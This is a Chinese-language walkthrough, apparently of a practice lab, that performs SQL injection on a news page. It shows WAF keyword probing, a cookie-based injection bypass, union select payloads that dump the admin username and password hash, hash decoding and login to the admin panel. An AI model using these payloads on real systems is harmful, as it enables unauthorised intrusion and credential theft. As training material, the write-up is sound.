点击传送门
来到目标公司网站
可以看到有很多的网页
现在我们需要寻找注入点,注入点存在的页面一般可以明显的显示出正确页面和错误页面
这里可以看到有新闻页面
有新闻的一般选择新闻页面
我们点击第一个新闻
进来后可以看到
URL为
http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=171
开始试探
(1)判断waf拦截的关键字
'触发waf
and触发waf
or触发waf
select触发waf
union order by不会触发waf
--+不能被数据库识别,要使用#
(2)联合查询注入尝试
得到注入点数量,构建联合查询语句
?id=171 union select 1,2,3,4,5,6,7,8,9,10#
利用SQL绕过手法使得select可用
试图转码绕过失败
试图利用/**/和/*!*/绕过失败
放弃联合查询
(3)cookies绕过尝试
尝试cookies绕过
直接访问http://g8wepfcp.ia.aqlab.cn/shownews.asp
利用bp抓包,将原cookies值
Cookie: ASPSESSIONIDACQTQQAS=OKOJFAODPDJCCFEKBAECGJDK
改为
Cookie: id=171
访问网页,发现访问的页面正常输出,cookies可以当值来用
将值改为联合查询语句
并猜测表admin的存在性
Cookie: id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin
页面返回正常,说明admin表存在
且页面返回的字段有2,3,7,8,9
这时可以将注入点2,3,7,8,9替换为字段名,用这种方式来猜测字段的存在,并体现返回值
Cookie: id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin
页面返回
username:admin
password:b9a2a2b5dffb918c
利用bp解码后
password为welcome
利用御剑后台扫描工具
得到后台网站
http://g8wepfcp.ia.aqlab.cn/admin/Login.asp
输入账户密码
成功通过